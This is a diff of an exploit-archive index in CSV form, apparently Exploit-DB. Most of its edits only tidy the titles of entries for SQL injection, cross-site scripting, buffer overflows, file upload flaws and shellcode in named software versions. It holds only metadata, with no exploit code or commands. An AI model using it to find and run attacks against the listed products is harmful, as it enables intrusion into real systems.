14265,platforms/php/webapps/14265.txt,"Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
|
||||
14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0
|
||||
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
|
||||
14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0
|
||||
|
@ -12575,11 +12575,11 @@ id,file,description,date,author,platform,type,port
|
|||
14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
|
||||
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0
|
||||
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
|
||||
14293,platforms/php/webapps/14293.txt,"Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
|
||||
14291,platforms/php/webapps/14291.txt,"Joomla! Component IXXO Cart - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
|
||||
14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
|
||||
14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 (com_redshop pid) - SQL Injection",2010-07-10,v3n0m,php,webapps,0
|
||||
14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ (com_quickfaq) - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
|
||||
14293,platforms/php/webapps/14293.txt,"Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
|
||||
14291,platforms/php/webapps/14291.txt,"Joomla! Component 'IXXO Cart' - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
|
||||
14434,platforms/php/webapps/14434.txt,"Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
|
||||
14312,platforms/php/webapps/14312.txt,"Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0
|
||||
14296,platforms/php/webapps/14296.txt,"Joomla! Component 'com_quickfaq' - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
|
||||
14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0
|
||||
14299,platforms/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0
|
||||
14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
|
||||
|
@ -12588,22 +12588,22 @@ id,file,description,date,author,platform,type,port
|
|||
14308,platforms/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
|
||||
14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
|
||||
14313,platforms/php/webapps/14313.txt,"Joomla! Component MyHome (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14315,platforms/php/webapps/14315.txt,"Joomla! Component MySms (com_mysms) - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14335,platforms/php/webapps/14335.txt,"Joomla! Component Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
|
||||
14313,platforms/php/webapps/14313.txt,"Joomla! Component 'com_myhome' - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14315,platforms/php/webapps/14315.txt,"Joomla! Component 'com_mysms' - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14335,platforms/php/webapps/14335.txt,"Joomla! Component 'healthstats' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
|
||||
14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
|
||||
14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps,0
|
||||
14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
|
||||
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,php,webapps,0
|
||||
14327,platforms/php/webapps/14327.txt,"Joomla! Component Rapid Recipe - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14327,platforms/php/webapps/14327.txt,"Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
14329,platforms/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
|
||||
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
14336,platforms/php/webapps/14336.txt,"Joomla! Component EasyBlog - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
|
||||
14336,platforms/php/webapps/14336.txt,"Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
|
||||
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
|
||||
14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
|
||||
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
|
||||
|
@ -12611,7 +12611,7 @@ id,file,description,date,author,platform,type,port
|
|||
14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
|
||||
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos,0
|
||||
14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - (shw) Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,windows,dos,0
|
||||
14350,platforms/php/webapps/14350.txt,"Joomla! Component QContacts (com_qcontacts) - SQL Injection",2010-07-13,_mlk_,php,webapps,0
|
||||
14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
|
||||
14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0
|
||||
14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0
|
||||
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)",2010-07-13,Node,windows,local,0
|
||||
|
@ -12623,7 +12623,7 @@ id,file,description,date,author,platform,type,port
|
|||
14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0
|
||||
14365,platforms/php/webapps/14365.txt,"Campsite CMS - Remote Persistent Cross-Site Scripting",2010-07-15,D4rk357,php,webapps,0
|
||||
14366,platforms/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps,0
|
||||
14368,platforms/php/webapps/14368.txt,"Joomla! Component RedShop 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0
|
||||
14368,platforms/php/webapps/14368.txt,"Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0
|
||||
14369,platforms/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - Cross-Site Scripting",2010-07-15,Markot,jsp,webapps,0
|
||||
14370,platforms/php/webapps/14370.txt,"BS Scripts Directory - 'info.php' SQL Injection",2010-07-15,D4rk357,php,webapps,0
|
||||
14371,platforms/php/webapps/14371.txt,"BS Scripts Directory - 'articlesdetails.php' SQL Injection",2010-07-16,k4k4shi,php,webapps,0
|
||||
|
@ -12650,8 +12650,8 @@ id,file,description,date,author,platform,type,port
|
|||
14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0
|
||||
14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps,0
|
||||
14393,platforms/php/webapps/14393.txt,"Calendarix - 'cal_cat.php' SQL Injection",2010-07-17,SixP4ck3r,php,webapps,0
|
||||
14394,platforms/php/webapps/14394.txt,"Joomla! Component com_spa - SQL Injection (2)",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
|
||||
14395,platforms/php/webapps/14395.txt,"Joomla! Component com_staticxt - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
|
||||
14394,platforms/php/webapps/14394.txt,"Joomla! Component 'com_spa' - SQL Injection (2)",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
|
||||
14395,platforms/php/webapps/14395.txt,"Joomla! Component 'com_staticxt' - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
|
||||
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
|
||||
14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
|
||||
14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
|
||||
|
@ -12672,7 +12672,7 @@ id,file,description,date,author,platform,type,port
|
|||
14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0
|
||||
14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,asp,webapps,0
|
||||
14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0
|
||||
14423,platforms/php/webapps/14423.txt,"Joomla! Component com_spa - SQL Injection (1)",2010-07-20,"ALTBTA ",php,webapps,0
|
||||
14423,platforms/php/webapps/14423.txt,"Joomla! Component 'com_spa' - SQL Injection (1)",2010-07-20,"ALTBTA ",php,webapps,0
|
||||
14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos,0
|
||||
14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps,0
|
||||
14426,platforms/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,php,webapps,0
|
||||
|
@ -12695,9 +12695,9 @@ id,file,description,date,author,platform,type,port
|
|||
14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
|
||||
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
|
||||
14447,platforms/windows/remote/14447.html,"Multiple Web Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0
|
||||
14448,platforms/php/webapps/14448.txt,"Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection",2010-07-23,Valentin,php,webapps,0
|
||||
14449,platforms/php/webapps/14449.txt,"Joomla! Component com_huruhelpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14448,platforms/php/webapps/14448.txt,"Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
|
||||
14449,platforms/php/webapps/14449.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
|
||||
14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
|
||||
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
|
||||
|
@ -12708,37 +12708,37 @@ id,file,description,date,author,platform,type,port
|
|||
14458,platforms/php/webapps/14458.txt,"sNews - 'index.php' SQL Injection",2010-07-24,MajoR,php,webapps,0
|
||||
14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0
|
||||
14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0
|
||||
14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery (com_oziogallery) - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
|
||||
14463,platforms/php/webapps/14463.txt,"Joomla! Component ITArmory (com_itarmory) - SQL Injection",2010-07-24,Craw,php,webapps,0
|
||||
14462,platforms/php/webapps/14462.txt,"Joomla! Component 'com_oziogallery' - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
|
||||
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
|
||||
14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - '.m3u' Universal Buffer Overflow",2010-07-24,s-dz,windows,local,0
|
||||
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
|
||||
14466,platforms/php/webapps/14466.txt,"Joomla! Component com_joomdle) 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
|
||||
14467,platforms/php/webapps/14467.txt,"Joomla! Component com_youtube - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
|
||||
14466,platforms/php/webapps/14466.txt,"Joomla! Component 'com_joomdle' 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
|
||||
14467,platforms/php/webapps/14467.txt,"Joomla! Component 'com_youtube' - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
|
||||
14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0
|
||||
14470,platforms/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps,0
|
||||
14471,platforms/php/webapps/14471.txt,"CMS Ignition - SQL Injection",2010-07-25,neavorc,php,webapps,0
|
||||
14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0
|
||||
14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0
|
||||
14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0
|
||||
14476,platforms/php/webapps/14476.txt,"Joomla! Component com_Joomla-visites - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
|
||||
14476,platforms/php/webapps/14476.txt,"Joomla! Component 'com_Joomla-visites' - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
|
||||
14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/Denial of Service",2010-07-26,"Praveen Darshanam",windows,dos,0
|
||||
14481,platforms/php/webapps/14481.txt,"Joomla! Component TTVideo 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14481,platforms/php/webapps/14481.txt,"Joomla! Component 'com_ttvideo' 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local,0
|
||||
14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
|
||||
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
|
||||
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
|
||||
14488,platforms/php/webapps/14488.txt,"Joomla! Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14488,platforms/php/webapps/14488.txt,"Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
|
||||
14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0
|
||||
14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0
|
||||
14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0
|
||||
14495,platforms/php/webapps/14495.txt,"Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0
|
||||
14495,platforms/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0
|
||||
14499,platforms/php/webapps/14499.txt,"Joomla! Component 'com_pbbooking' 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0
|
||||
14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0
|
||||
14501,platforms/php/webapps/14501.txt,"Joomla! Component 'com_SimpleShop' - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0
|
||||
14502,platforms/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0
|
||||
14502,platforms/php/webapps/14502.txt,"Joomla! Component 'com_beamospetition' - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0
|
||||
14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0
|
||||
14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0
|
||||
14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow (SEH)",2010-07-30,loneferret,windows,remote,0
|
||||
|
@ -13929,7 +13929,7 @@ id,file,description,date,author,platform,type,port
|
|||
16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0
|
||||
16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow (SEH)",2011-01-29,m0nna,windows,local,0
|
||||
16074,platforms/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps,0
|
||||
16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0
|
||||
16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",windows,remote,0
|
||||
16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 / 3.2.2 - Persistent Cross-Site Scripting via LinkBacks",2011-01-30,MaXe,php,webapps,0
|
||||
16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 / 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0
|
||||
16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0
|
||||
|
@ -15056,7 +15056,7 @@ id,file,description,date,author,platform,type,port
|
|||
17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0
|
||||
17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
|
||||
17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
|
||||
17303,platforms/php/webapps/17303.txt,"Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
|
||||
17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
|
||||
17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0
|
||||
17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0
|
||||
17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
|
||||
|
@ -21150,7 +21150,7 @@ id,file,description,date,author,platform,type,port
|
|||
23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0
|
||||
23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0
|
||||
23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0
|
||||
23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Remote File Download",2004-04-01,"Donato Ferrante",windows,remote,0
|
||||
23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Arbitrary File Download",2004-04-01,"Donato Ferrante",windows,remote,0
|
||||
23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps,0
|
||||
23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 - myhome.php SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0
|
||||
23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal",2004-04-05,dr_insane,windows,remote,0
|
||||
|
@ -28039,7 +28039,7 @@ id,file,description,date,author,platform,type,port
|
|||
31074,platforms/php/webapps/31074.txt,"Nucleus CMS 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",php,webapps,0
|
||||
31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 - 'index.php' Cross-Site Scripting",2008-01-29,ShaFuck31,php,webapps,0
|
||||
31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",linux,remote,0
|
||||
31077,platforms/php/webapps/31077.txt,"Joomla! / Mambo Component com_buslicense - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
||||
31077,platforms/php/webapps/31077.txt,"Joomla! / Mambo Component 'com_buslicense' - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
||||
31078,platforms/hardware/remote/31078.txt,"2WIRE Routers - 'H04_POST' Access Validation",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
|
||||
31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting",2008-01-30,NBBN,php,webapps,0
|
||||
31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection",2008-01-30,ShaFuck31,php,webapps,0
|
||||
|
@ -28080,7 +28080,7 @@ id,file,description,date,author,platform,type,port
|
|||
31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote,0
|
||||
31119,platforms/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Security Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0
|
||||
31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-07,"Alexandr Polyakov",php,webapps,0
|
||||
31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component com_sermon 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0
|
||||
31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component 'com_sermon' 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0
|
||||
31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
|
||||
31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Inclusion",2008-02-08,"Alexandr Polyakov",php,webapps,0
|
||||
31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0
|
||||
|
@ -28096,7 +28096,7 @@ id,file,description,date,author,platform,type,port
|
|||
31134,platforms/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,php,webapps,0
|
||||
31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injections",2008-02-11,breaker_unit,php,webapps,0
|
||||
31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0
|
||||
